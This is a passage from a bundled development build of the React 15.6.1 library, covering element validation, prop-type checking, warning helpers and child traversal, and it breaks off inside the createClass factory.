_dereq_(19);\n\nvar canDefineProperty = _dereq_(18);\nvar getIteratorFn = _dereq_(21);\nvar warning = _dereq_(31);\nvar lowPriorityWarning = _dereq_(23);\n\nfunction getDeclarationErrorAddendum() {\n  if (ReactCurrentOwner.current) {\n    var name = ReactCurrentOwner.current.getName();\n    if (name) {\n      return ' Check the render method of `' + name + '`.';\n    }\n  }\n  return '';\n}\n\nfunction getSourceInfoErrorAddendum(elementProps) {\n  if (elementProps !== null && elementProps !== undefined && elementProps.__source !== undefined) {\n    var source = elementProps.__source;\n    var fileName = source.fileName.replace(/^.*[\\\\\\/]/, '');\n    var lineNumber = source.lineNumber;\n    return ' Check your code at ' + fileName + ':' + lineNumber + '.';\n  }\n  return '';\n}\n\n/**\n * Warn if there's no key explicitly set on dynamic arrays of children or\n * object keys are not valid. This allows us to keep track of children between\n * updates.\n */\nvar ownerHasKeyUseWarning = {};\n\nfunction getCurrentComponentErrorInfo(parentType) {\n  var info = getDeclarationErrorAddendum();\n\n  if (!info) {\n    var parentName = typeof parentType === 'string' ? parentType : parentType.displayName || parentType.name;\n    if (parentName) {\n      info = ' Check the top-level render call using <' + parentName + '>.';\n    }\n  }\n  return info;\n}\n\n/**\n * Warn if the element doesn't have an explicit key assigned to it.\n * This element is in an array. The array could grow and shrink or be\n * reordered. All children that haven't already been validated are required to\n * have a \"key\" property assigned to it. Error statuses are cached so a warning\n * will only be shown once.\n *\n * @internal\n * @param {ReactElement} element Element that requires a key.\n * @param {*} parentType element's parent's type.\n */\nfunction validateExplicitKey(element, parentType) {\n  if (!element._store || element._store.validated || element.key != null) {\n    return;\n  }\n  element._store.validated = true;\n\n  var memoizer = ownerHasKeyUseWarning.uniqueKey || (ownerHasKeyUseWarning.uniqueKey = {});\n\n  var currentComponentErrorInfo = getCurrentComponentErrorInfo(parentType);\n  if (memoizer[currentComponentErrorInfo]) {\n    return;\n  }\n  memoizer[currentComponentErrorInfo] = true;\n\n  // Usually the current owner is the offender, but if it accepts children as a\n  // property, it may be the creator of the child that's responsible for\n  // assigning it a key.\n  var childOwner = '';\n  if (element && element._owner && element._owner !== ReactCurrentOwner.current) {\n    // Give the component that originally created this child.\n    childOwner = ' It was passed a child from ' + element._owner.getName() + '.';\n  }\n\n  \"development\" !== 'production' ? warning(false, 'Each child in an array or iterator should have a unique \"key\" prop.' + '%s%s See https://fb.me/react-warning-keys for more information.%s', currentComponentErrorInfo, childOwner, ReactComponentTreeHook.getCurrentStackAddendum(element)) : void 0;\n}\n\n/**\n * Ensure that every element either is passed in a static location, in an\n * array with an explicit keys property defined, or in an object literal\n * with valid key property.\n *\n * @internal\n * @param {ReactNode} node Statically passed child of any type.\n * @param {*} parentType node's parent's type.\n */\nfunction validateChildKeys(node, parentType) {\n  if (typeof node !== 'object') {\n    return;\n  }\n  if (Array.isArray(node)) {\n    for (var i = 0; i < node.length; i++) {\n      var child = node[i];\n      if (ReactElement.isValidElement(child)) {\n        validateExplicitKey(child, parentType);\n      }\n    }\n  } else if (ReactElement.isValidElement(node)) {\n    // This element was passed in a valid location.\n    if (node._store) {\n      node._store.validated = true;\n    }\n  } else if (node) {\n    var iteratorFn = getIteratorFn(node);\n    // Entry iterators provide implicit keys.\n    if (iteratorFn) {\n      if (iteratorFn !== node.entries) {\n        var iterator = iteratorFn.call(node);\n        var step;\n        while (!(step = iterator.next()).done) {\n          if (ReactElement.isValidElement(step.value)) {\n            validateExplicitKey(step.value, parentType);\n          }\n        }\n      }\n    }\n  }\n}\n\n/**\n * Given an element, validate that its props follow the propTypes definition,\n * provided by the type.\n *\n * @param {ReactElement} element\n */\nfunction validatePropTypes(element) {\n  var componentClass = element.type;\n  if (typeof componentClass !== 'function') {\n    return;\n  }\n  var name = componentClass.displayName || componentClass.name;\n  if (componentClass.propTypes) {\n    checkReactTypeSpec(componentClass.propTypes, element.props, 'prop', name, element, null);\n  }\n  if (typeof componentClass.getDefaultProps === 'function') {\n    \"development\" !== 'production' ? warning(componentClass.getDefaultProps.isReactClassApproved, 'getDefaultProps is only used on classic React.createClass ' + 'definitions. Use a static property named `defaultProps` instead.') : void 0;\n  }\n}\n\nvar ReactElementValidator = {\n  createElement: function (type, props, children) {\n    var validType = typeof type === 'string' || typeof type === 'function';\n    // We warn in this case but don't throw. We expect the element creation to\n    // succeed and there will likely be errors in render.\n    if (!validType) {\n      if (typeof type !== 'function' && typeof type !== 'string') {\n        var info = '';\n        if (type === undefined || typeof type === 'object' && type !== null && Object.keys(type).length === 0) {\n          info += ' You likely forgot to export your component from the file ' + \"it's defined in.\";\n        }\n\n        var sourceInfo = getSourceInfoErrorAddendum(props);\n        if (sourceInfo) {\n          info += sourceInfo;\n        } else {\n          info += getDeclarationErrorAddendum();\n        }\n\n        info += ReactComponentTreeHook.getCurrentStackAddendum();\n\n        var currentSource = props !== null && props !== undefined && props.__source !== undefined ? props.__source : null;\n        ReactComponentTreeHook.pushNonStandardWarningStack(true, currentSource);\n        \"development\" !== 'production' ? warning(false, 'React.createElement: type is invalid -- expected a string (for ' + 'built-in components) or a class/function (for composite ' + 'components) but got: %s.%s', type == null ? type : typeof type, info) : void 0;\n        ReactComponentTreeHook.popNonStandardWarningStack();\n      }\n    }\n\n    var element = ReactElement.createElement.apply(this, arguments);\n\n    // The result can be nullish if a mock or a custom function is used.\n    // TODO: Drop this when these are no longer allowed as the type argument.\n    if (element == null) {\n      return element;\n    }\n\n    // Skip key warning if the type isn't valid since our key validation logic\n    // doesn't expect a non-string/function type and can throw confusing errors.\n    // We don't want exception behavior to differ between dev and prod.\n    // (Rendering will throw with a helpful message and as soon as the type is\n    // fixed, the key warnings will appear.)\n    if (validType) {\n      for (var i = 2; i < arguments.length; i++) {\n        validateChildKeys(arguments[i], type);\n      }\n    }\n\n    validatePropTypes(element);\n\n    return element;\n  },\n\n  createFactory: function (type) {\n    var validatedFactory = ReactElementValidator.createElement.bind(null, type);\n    // Legacy hook TODO: Warn if this is accessed\n    validatedFactory.type = type;\n\n    if (\"development\" !== 'production') {\n      if (canDefineProperty) {\n        Object.defineProperty(validatedFactory, 'type', {\n          enumerable: false,\n          get: function () {\n            lowPriorityWarning(false, 'Factory.type is deprecated. Access the class directly ' + 'before passing it to createFactory.');\n            Object.defineProperty(this, 'type', {\n              value: type\n            });\n            return type;\n          }\n        });\n      }\n    }\n\n    return validatedFactory;\n  },\n\n  cloneElement: function (element, props, children) {\n    var newElement = ReactElement.cloneElement.apply(this, arguments);\n    for (var i = 2; i < arguments.length; i++) {\n      validateChildKeys(arguments[i], newElement.type);\n    }\n    validatePropTypes(newElement);\n    return newElement;\n  }\n};\n\nmodule.exports = ReactElementValidator;\n},{\"18\":18,\"19\":19,\"21\":21,\"23\":23,\"31\":31,\"6\":6,\"7\":7,\"9\":9}],12:[function(_dereq_,module,exports){\n/**\n * Copyright 2015-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar warning = _dereq_(31);\n\nfunction warnNoop(publicInstance, callerName) {\n  if (\"development\" !== 'production') {\n    var constructor = publicInstance.constructor;\n    \"development\" !== 'production' ? warning(false, '%s(...): Can only update a mounted or mounting component. ' + 'This usually means you called %s() on an unmounted component. ' + 'This is a no-op. Please check the code for the %s component.', callerName, callerName, constructor && (constructor.displayName || constructor.name) || 'ReactClass') : void 0;\n  }\n}\n\n/**\n * This is the abstract API for an update queue.\n */\nvar ReactNoopUpdateQueue = {\n  /**\n   * Checks whether or not this composite component is mounted.\n   * @param {ReactClass} publicInstance The instance we want to test.\n   * @return {boolean} True if mounted, false otherwise.\n   * @protected\n   * @final\n   */\n  isMounted: function (publicInstance) {\n    return false;\n  },\n\n  /**\n   * Enqueue a callback that will be executed after all the pending updates\n   * have processed.\n   *\n   * @param {ReactClass} publicInstance The instance to use as `this` context.\n   * @param {?function} callback Called after state is updated.\n   * @internal\n   */\n  enqueueCallback: function (publicInstance, callback) {},\n\n  /**\n   * Forces an update. This should only be invoked when it is known with\n   * certainty that we are **not** in a DOM transaction.\n   *\n   * You may want to call this when you know that some deeper aspect of the\n   * component's state has changed but `setState` was not called.\n   *\n   * This will not invoke `shouldComponentUpdate`, but it will invoke\n   * `componentWillUpdate` and `componentDidUpdate`.\n   *\n   * @param {ReactClass} publicInstance The instance that should rerender.\n   * @internal\n   */\n  enqueueForceUpdate: function (publicInstance) {\n    warnNoop(publicInstance, 'forceUpdate');\n  },\n\n  /**\n   * Replaces all of the state. Always use this or `setState` to mutate state.\n   * You should treat `this.state` as immutable.\n   *\n   * There is no guarantee that `this.state` will be immediately updated, so\n   * accessing `this.state` after calling this method may return the old value.\n   *\n   * @param {ReactClass} publicInstance The instance that should rerender.\n   * @param {object} completeState Next state.\n   * @internal\n   */\n  enqueueReplaceState: function (publicInstance, completeState) {\n    warnNoop(publicInstance, 'replaceState');\n  },\n\n  /**\n   * Sets a subset of the state. This only exists because _pendingState is\n   * internal. This provides a merging strategy that is not available to deep\n   * properties which is confusing. TODO: Expose pendingState or don't use it\n   * during the merge.\n   *\n   * @param {ReactClass} publicInstance The instance that should rerender.\n   * @param {object} partialState Next partial state to be merged with state.\n   * @internal\n   */\n  enqueueSetState: function (publicInstance, partialState) {\n    warnNoop(publicInstance, 'setState');\n  }\n};\n\nmodule.exports = ReactNoopUpdateQueue;\n},{\"31\":31}],13:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar ReactPropTypeLocationNames = {};\n\nif (\"development\" !== 'production') {\n  ReactPropTypeLocationNames = {\n    prop: 'prop',\n    context: 'context',\n    childContext: 'child context'\n  };\n}\n\nmodule.exports = ReactPropTypeLocationNames;\n},{}],14:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _require = _dereq_(9),\n    isValidElement = _require.isValidElement;\n\nvar factory = _dereq_(34);\n\nmodule.exports = factory(isValidElement);\n},{\"34\":34,\"9\":9}],15:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar ReactPropTypesSecret = 'SECRET_DO_NOT_PASS_THIS_OR_YOU_WILL_BE_FIRED';\n\nmodule.exports = ReactPropTypesSecret;\n},{}],16:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _assign = _dereq_(32);\n\nvar React = _dereq_(3);\n\n// `version` will be added here by the React module.\nvar ReactUMDEntry = _assign(React, {\n  __SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED: {\n    ReactCurrentOwner: _dereq_(7)\n  }\n});\n\nif (\"development\" !== 'production') {\n  _assign(ReactUMDEntry.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED, {\n    // ReactComponentTreeHook should not be included in production.\n    ReactComponentTreeHook: _dereq_(6),\n    getNextDebugID: _dereq_(22)\n  });\n}\n\nmodule.exports = ReactUMDEntry;\n},{\"22\":22,\"3\":3,\"32\":32,\"6\":6,\"7\":7}],17:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nmodule.exports = '15.6.1';\n},{}],18:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar canDefineProperty = false;\nif (\"development\" !== 'production') {\n  try {\n    // $FlowFixMe https://github.com/facebook/flow/issues/285\n    Object.defineProperty({}, 'x', { get: function () {} });\n    canDefineProperty = true;\n  } catch (x) {\n    // IE will fail on defineProperty\n  }\n}\n\nmodule.exports = canDefineProperty;\n},{}],19:[function(_dereq_,module,exports){\n(function (process){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(25);\n\nvar ReactPropTypeLocationNames = _dereq_(13);\nvar ReactPropTypesSecret = _dereq_(15);\n\nvar invariant = _dereq_(30);\nvar warning = _dereq_(31);\n\nvar ReactComponentTreeHook;\n\nif (typeof process !== 'undefined' && process.env && \"development\" === 'test') {\n  // Temporary hack.\n  // Inline requires don't work well with Jest:\n  // https://github.com/facebook/react/issues/7240\n  // Remove the inline requires when we don't need them anymore:\n  // https://github.com/facebook/react/pull/7178\n  ReactComponentTreeHook = _dereq_(6);\n}\n\nvar loggedTypeFailures = {};\n\n/**\n * Assert that the values match with the type specs.\n * Error messages are memorized and will only be shown once.\n *\n * @param {object} typeSpecs Map of name to a ReactPropType\n * @param {object} values Runtime values that need to be type-checked\n * @param {string} location e.g. \"prop\", \"context\", \"child context\"\n * @param {string} componentName Name of the component for error messages.\n * @param {?object} element The React element that is being type-checked\n * @param {?number} debugID The React component instance that is being type-checked\n * @private\n */\nfunction checkReactTypeSpec(typeSpecs, values, location, componentName, element, debugID) {\n  for (var typeSpecName in typeSpecs) {\n    if (typeSpecs.hasOwnProperty(typeSpecName)) {\n      var error;\n      // Prop type validation may throw. In case they do, we don't want to\n      // fail the render phase where it didn't fail before. So we log it.\n      // After these have been cleaned up, we'll let them throw.\n      try {\n        // This is intentionally an invariant that gets caught. It's the same\n        // behavior as without this statement except with a better message.\n        !(typeof typeSpecs[typeSpecName] === 'function') ? \"development\" !== 'production' ? invariant(false, '%s: %s type `%s` is invalid; it must be a function, usually from React.PropTypes.', componentName || 'React class', ReactPropTypeLocationNames[location], typeSpecName) : _prodInvariant('84', componentName || 'React class', ReactPropTypeLocationNames[location], typeSpecName) : void 0;\n        error = typeSpecs[typeSpecName](values, typeSpecName, componentName, location, null, ReactPropTypesSecret);\n      } catch (ex) {\n        error = ex;\n      }\n      \"development\" !== 'production' ? warning(!error || error instanceof Error, '%s: type specification of %s `%s` is invalid; the type checker ' + 'function must return `null` or an `Error` but returned a %s. ' + 'You may have forgotten to pass an argument to the type checker ' + 'creator (arrayOf, instanceOf, objectOf, oneOf, oneOfType, and ' + 'shape all require an argument).', componentName || 'React class', ReactPropTypeLocationNames[location], typeSpecName, typeof error) : void 0;\n      if (error instanceof Error && !(error.message in loggedTypeFailures)) {\n        // Only monitor this failure once because there tends to be a lot of the\n        // same error.\n        loggedTypeFailures[error.message] = true;\n\n        var componentStackInfo = '';\n\n        if (\"development\" !== 'production') {\n          if (!ReactComponentTreeHook) {\n            ReactComponentTreeHook = _dereq_(6);\n          }\n          if (debugID !== null) {\n            componentStackInfo = ReactComponentTreeHook.getStackAddendumByID(debugID);\n          } else if (element !== null) {\n            componentStackInfo = ReactComponentTreeHook.getCurrentStackAddendum(element);\n          }\n        }\n\n        \"development\" !== 'production' ? warning(false, 'Failed %s type: %s%s', location, error.message, componentStackInfo) : void 0;\n      }\n    }\n  }\n}\n\nmodule.exports = checkReactTypeSpec;\n}).call(this,undefined)\n},{\"13\":13,\"15\":15,\"25\":25,\"30\":30,\"31\":31,\"6\":6}],20:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _require = _dereq_(4),\n    Component = _require.Component;\n\nvar _require2 = _dereq_(9),\n    isValidElement = _require2.isValidElement;\n\nvar ReactNoopUpdateQueue = _dereq_(12);\nvar factory = _dereq_(27);\n\nmodule.exports = factory(Component, isValidElement, ReactNoopUpdateQueue);\n},{\"12\":12,\"27\":27,\"4\":4,\"9\":9}],21:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\n/* global Symbol */\n\nvar ITERATOR_SYMBOL = typeof Symbol === 'function' && Symbol.iterator;\nvar FAUX_ITERATOR_SYMBOL = '@@iterator'; // Before Symbol spec.\n\n/**\n * Returns the iterator method function contained on the iterable object.\n *\n * Be sure to invoke the function with the iterable as context:\n *\n *     var iteratorFn = getIteratorFn(myIterable);\n *     if (iteratorFn) {\n *       var iterator = iteratorFn.call(myIterable);\n *       ...\n *     }\n *\n * @param {?object} maybeIterable\n * @return {?function}\n */\nfunction getIteratorFn(maybeIterable) {\n  var iteratorFn = maybeIterable && (ITERATOR_SYMBOL && maybeIterable[ITERATOR_SYMBOL] || maybeIterable[FAUX_ITERATOR_SYMBOL]);\n  if (typeof iteratorFn === 'function') {\n    return iteratorFn;\n  }\n}\n\nmodule.exports = getIteratorFn;\n},{}],22:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar nextDebugID = 1;\n\nfunction getNextDebugID() {\n  return nextDebugID++;\n}\n\nmodule.exports = getNextDebugID;\n},{}],23:[function(_dereq_,module,exports){\n/**\n * Copyright 2014-2015, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\n/**\n * Forked from fbjs/warning:\n * https://github.com/facebook/fbjs/blob/e66ba20ad5be433eb54423f2b097d829324d9de6/packages/fbjs/src/__forks__/warning.js\n *\n * Only change is we use console.warn instead of console.error,\n * and do nothing when 'console' is not supported.\n * This really simplifies the code.\n * ---\n * Similar to invariant but only logs a warning if the condition is not met.\n * This can be used to log issues in development environments in critical\n * paths. Removing the logging code for production environments will keep the\n * same logic and follow the same code paths.\n */\n\nvar lowPriorityWarning = function () {};\n\nif (\"development\" !== 'production') {\n  var printWarning = function (format) {\n    for (var _len = arguments.length, args = Array(_len > 1 ? _len - 1 : 0), _key = 1; _key < _len; _key++) {\n      args[_key - 1] = arguments[_key];\n    }\n\n    var argIndex = 0;\n    var message = 'Warning: ' + format.replace(/%s/g, function () {\n      return args[argIndex++];\n    });\n    if (typeof console !== 'undefined') {\n      console.warn(message);\n    }\n    try {\n      // --- Welcome to debugging React ---\n      // This error was thrown as a convenience so that you can use this stack\n      // to find the callsite that caused this warning to fire.\n      throw new Error(message);\n    } catch (x) {}\n  };\n\n  lowPriorityWarning = function (condition, format) {\n    if (format === undefined) {\n      throw new Error('`warning(condition, format, ...args)` requires a warning ' + 'message argument');\n    }\n    if (!condition) {\n      for (var _len2 = arguments.length, args = Array(_len2 > 2 ? _len2 - 2 : 0), _key2 = 2; _key2 < _len2; _key2++) {\n        args[_key2 - 2] = arguments[_key2];\n      }\n\n      printWarning.apply(undefined, [format].concat(args));\n    }\n  };\n}\n\nmodule.exports = lowPriorityWarning;\n},{}],24:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n'use strict';\n\nvar _prodInvariant = _dereq_(25);\n\nvar ReactElement = _dereq_(9);\n\nvar invariant = _dereq_(30);\n\n/**\n * Returns the first child in a collection of children and verifies that there\n * is only one child in the collection.\n *\n * See https://facebook.github.io/react/docs/top-level-api.html#react.children.only\n *\n * The current implementation of this function assumes that a single child gets\n * passed without a wrapper, but the purpose of this helper function is to\n * abstract away the particular structure of children.\n *\n * @param {?object} children Child collection structure.\n * @return {ReactElement} The first and only `ReactElement` contained in the\n * structure.\n */\nfunction onlyChild(children) {\n  !ReactElement.isValidElement(children) ? \"development\" !== 'production' ? invariant(false, 'React.Children.only expected to receive a single React element child.') : _prodInvariant('143') : void 0;\n  return children;\n}\n\nmodule.exports = onlyChild;\n},{\"25\":25,\"30\":30,\"9\":9}],25:[function(_dereq_,module,exports){\n/**\n * Copyright (c) 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n'use strict';\n\n/**\n * WARNING: DO NOT manually require this module.\n * This is a replacement for `invariant(...)` used by the error code system\n * and will _only_ be required by the corresponding babel pass.\n * It always throws.\n */\n\nfunction reactProdInvariant(code) {\n  var argCount = arguments.length - 1;\n\n  var message = 'Minified React error #' + code + '; visit ' + 'http://facebook.github.io/react/docs/error-decoder.html?invariant=' + code;\n\n  for (var argIdx = 0; argIdx < argCount; argIdx++) {\n    message += '&args[]=' + encodeURIComponent(arguments[argIdx + 1]);\n  }\n\n  message += ' for the full message or use the non-minified dev environment' + ' for full errors and additional helpful warnings.';\n\n  var error = new Error(message);\n  error.name = 'Invariant Violation';\n  error.framesToPop = 1; // we don't care about reactProdInvariant's own frame\n\n  throw error;\n}\n\nmodule.exports = reactProdInvariant;\n},{}],26:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(25);\n\nvar ReactCurrentOwner = _dereq_(7);\nvar REACT_ELEMENT_TYPE = _dereq_(10);\n\nvar getIteratorFn = _dereq_(21);\nvar invariant = _dereq_(30);\nvar KeyEscapeUtils = _dereq_(1);\nvar warning = _dereq_(31);\n\nvar SEPARATOR = '.';\nvar SUBSEPARATOR = ':';\n\n/**\n * This is inlined from ReactElement since this file is shared between\n * isomorphic and renderers. We could extract this to a\n *\n */\n\n/**\n * TODO: Test that a single child and an array with one item have the same key\n * pattern.\n */\n\nvar didWarnAboutMaps = false;\n\n/**\n * Generate a key string that identifies a component within a set.\n *\n * @param {*} component A component that could contain a manual key.\n * @param {number} index Index that is used if a manual key is not provided.\n * @return {string}\n */\nfunction getComponentKey(component, index) {\n  // Do some typechecking here since we call this blindly. We want to ensure\n  // that we don't block potential future ES APIs.\n  if (component && typeof component === 'object' && component.key != null) {\n    // Explicit key\n    return KeyEscapeUtils.escape(component.key);\n  }\n  // Implicit key determined by the index in the set\n  return index.toString(36);\n}\n\n/**\n * @param {?*} children Children tree container.\n * @param {!string} nameSoFar Name of the key path so far.\n * @param {!function} callback Callback to invoke with each child found.\n * @param {?*} traverseContext Used to pass information throughout the traversal\n * process.\n * @return {!number} The number of children in this subtree.\n */\nfunction traverseAllChildrenImpl(children, nameSoFar, callback, traverseContext) {\n  var type = typeof children;\n\n  if (type === 'undefined' || type === 'boolean') {\n    // All of the above are perceived as null.\n    children = null;\n  }\n\n  if (children === null || type === 'string' || type === 'number' ||\n  // The following is inlined from ReactElement. This means we can optimize\n  // some checks. React Fiber also inlines this logic for similar purposes.\n  type === 'object' && children.$$typeof === REACT_ELEMENT_TYPE) {\n    callback(traverseContext, children,\n    // If it's the only child, treat the name as if it was wrapped in an array\n    // so that it's consistent if the number of children grows.\n    nameSoFar === '' ? SEPARATOR + getComponentKey(children, 0) : nameSoFar);\n    return 1;\n  }\n\n  var child;\n  var nextName;\n  var subtreeCount = 0; // Count of children found in the current subtree.\n  var nextNamePrefix = nameSoFar === '' ? SEPARATOR : nameSoFar + SUBSEPARATOR;\n\n  if (Array.isArray(children)) {\n    for (var i = 0; i < children.length; i++) {\n      child = children[i];\n      nextName = nextNamePrefix + getComponentKey(child, i);\n      subtreeCount += traverseAllChildrenImpl(child, nextName, callback, traverseContext);\n    }\n  } else {\n    var iteratorFn = getIteratorFn(children);\n    if (iteratorFn) {\n      var iterator = iteratorFn.call(children);\n      var step;\n      if (iteratorFn !== children.entries) {\n        var ii = 0;\n        while (!(step = iterator.next()).done) {\n          child = step.value;\n          nextName = nextNamePrefix + getComponentKey(child, ii++);\n          subtreeCount += traverseAllChildrenImpl(child, nextName, callback, traverseContext);\n        }\n      } else {\n        if (\"development\" !== 'production') {\n          var mapsAsChildrenAddendum = '';\n          if (ReactCurrentOwner.current) {\n            var mapsAsChildrenOwnerName = ReactCurrentOwner.current.getName();\n            if (mapsAsChildrenOwnerName) {\n              mapsAsChildrenAddendum = ' Check the render method of `' + mapsAsChildrenOwnerName + '`.';\n            }\n          }\n          \"development\" !== 'production' ? warning(didWarnAboutMaps, 'Using Maps as children is not yet fully supported. It is an ' + 'experimental feature that might be removed. Convert it to a ' + 'sequence / iterable of keyed ReactElements instead.%s', mapsAsChildrenAddendum) : void 0;\n          didWarnAboutMaps = true;\n        }\n        // Iterator will provide entry [k,v] tuples rather than values.\n        while (!(step = iterator.next()).done) {\n          var entry = step.value;\n          if (entry) {\n            child = entry[1];\n            nextName = nextNamePrefix + KeyEscapeUtils.escape(entry[0]) + SUBSEPARATOR + getComponentKey(child, 0);\n            subtreeCount += traverseAllChildrenImpl(child, nextName, callback, traverseContext);\n          }\n        }\n      }\n    } else if (type === 'object') {\n      var addendum = '';\n      if (\"development\" !== 'production') {\n        addendum = ' If you meant to render a collection of children, use an array ' + 'instead or wrap the object using createFragment(object) from the ' + 'React add-ons.';\n        if (children._isReactElement) {\n          addendum = \" It looks like you're using an element created by a different \" + 'version of React. Make sure to use only one copy of React.';\n        }\n        if (ReactCurrentOwner.current) {\n          var name = ReactCurrentOwner.current.getName();\n          if (name) {\n            addendum += ' Check the render method of `' + name + '`.';\n          }\n        }\n      }\n      var childrenString = String(children);\n      !false ? \"development\" !== 'production' ? invariant(false, 'Objects are not valid as a React child (found: %s).%s', childrenString === '[object Object]' ? 'object with keys {' + Object.keys(children).join(', ') + '}' : childrenString, addendum) : _prodInvariant('31', childrenString === '[object Object]' ? 'object with keys {' + Object.keys(children).join(', ') + '}' : childrenString, addendum) : void 0;\n    }\n  }\n\n  return subtreeCount;\n}\n\n/**\n * Traverses children that are typically specified as `props.children`, but\n * might also be specified through attributes:\n *\n * - `traverseAllChildren(this.props.children, ...)`\n * - `traverseAllChildren(this.props.leftPanelChildren, ...)`\n *\n * The `traverseContext` is an optional argument that is passed through the\n * entire traversal. It can be used to store accumulations or anything else that\n * the callback might find relevant.\n *\n * @param {?*} children Children tree object.\n * @param {!function} callback To invoke upon traversing each child.\n * @param {?*} traverseContext Context for traversal.\n * @return {!number} The number of children in this subtree.\n */\nfunction traverseAllChildren(children, callback, traverseContext) {\n  if (children == null) {\n    return 0;\n  }\n\n  return traverseAllChildrenImpl(children, '', callback, traverseContext);\n}\n\nmodule.exports = traverseAllChildren;\n},{\"1\":1,\"10\":10,\"21\":21,\"25\":25,\"30\":30,\"31\":31,\"7\":7}],27:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _assign = _dereq_(32);\n\nvar emptyObject = _dereq_(29);\nvar _invariant = _dereq_(30);\n\nif (\"development\" !== 'production') {\n  var warning = _dereq_(31);\n}\n\nvar MIXINS_KEY = 'mixins';\n\n// Helper function to allow the creation of anonymous functions which do not\n// have .name set to the name of the variable being assigned to.\nfunction identity(fn) {\n  return fn;\n}\n\nvar ReactPropTypeLocationNames;\nif (\"development\" !== 'production') {\n  ReactPropTypeLocationNames = {\n    prop: 'prop',\n    context: 'context',\n    childContext: 'child context'\n  };\n} else {\n  ReactPropTypeLocationNames = {};\n}\n\nfunction factory(ReactComponent, isValidElement, ReactNoopUpdateQueue) {\n  /**\n   * Policies that describe methods in `ReactClassInterface`.\n   */\n\n  var injectedMixins = [];\n\n  /**\n   * Composite components are higher-level components that compose other composite\n   * or host components.\n   *\n   * To create a new type of `ReactClass`, pass a specification of\n   * your new class to `React.createClass`. The only requirement of your class\n   * specification is that you implement a `render` method.\n   *\n   *   var MyComponent = React.createClass({\n   *     render: function() {\n   *       return <div>Hello World</div>;\n   *     }\n   *   });\n   *\n   * The class specification supports a specific protocol of methods that have\n   * special meaning (e.g. `render`). See `ReactClassInterface` for\n   * more the comprehensive protocol. Any other properties and methods in the\n   * class specification will be available on the prototype.\n   *\n   * @interface ReactClassInterface\n   * @internal\n   */\n  var ReactClassInterface = {\n    /**\n     * An array of Mixin objects to include when defining your component.\n    